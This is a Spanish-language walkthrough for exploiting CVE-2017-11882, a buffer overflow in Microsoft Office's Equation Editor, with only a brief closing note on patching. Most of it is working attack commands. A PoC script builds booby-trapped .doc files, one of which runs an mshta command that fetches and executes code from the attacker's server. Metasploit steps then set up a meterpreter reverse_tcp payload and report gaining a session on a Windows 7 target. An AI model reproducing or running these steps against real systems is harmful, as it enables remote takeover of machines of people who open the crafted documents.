
CVE-2017-11882 (bypass universal de Office 2003 a 2016)
Desde el punto de vista del efecto de explotación, puede vulnerar todas las versiones de Office, de 2003 a 2016, y la construcción de todo el entorno de ataque es muy sencilla. Esta vulnerabilidad es causada por el [Editor de ecuaciones] presente en el software de Office. Debido a que el proceso del editor no valida la longitud del nombre, se produce un desbordamiento de búfer. El atacante puede lograr la ejecución de código arbitrario mediante la construcción de caracteres especiales. Por ejemplo, si un hacker aprovecha esta vulnerabilidad para crear un archivo de Office con una puerta trasera (shell), cuando un usuario común abre ese archivo de Office, el ordenador puede ser controlado directamente por el hacker.
office 2003
office 2007
office 2010
office 2013
office 2016
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Al hacer clic en el archivo "test.doc" generado, se abre correctamente la calculadora.
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc


Se genera correctamente el archivo de Word 11882-3.doc.
Coloque el archivo cve_2017_11882.rb en el directorio /usr/share/metasploit-framework/modules/exploits/windows/smb:
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165
msf exploit(CVE-2017-11882) > set uripath 11882
msf exploit(CVE-2017-11882) > exploit
Inicie el modo de escucha:

Al hacer clic en el archivo 11882-3.doc en la máquina objetivo con Windows 7, ¡se obtienen sessions con éxito!

① Actualización en línea; active las actualizaciones de Windows Update. Este método es suficiente para la mayoría de las personas.
② Instalar el parche; la dirección del parche de Microsoft correspondiente a esta vulnerabilidad es: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882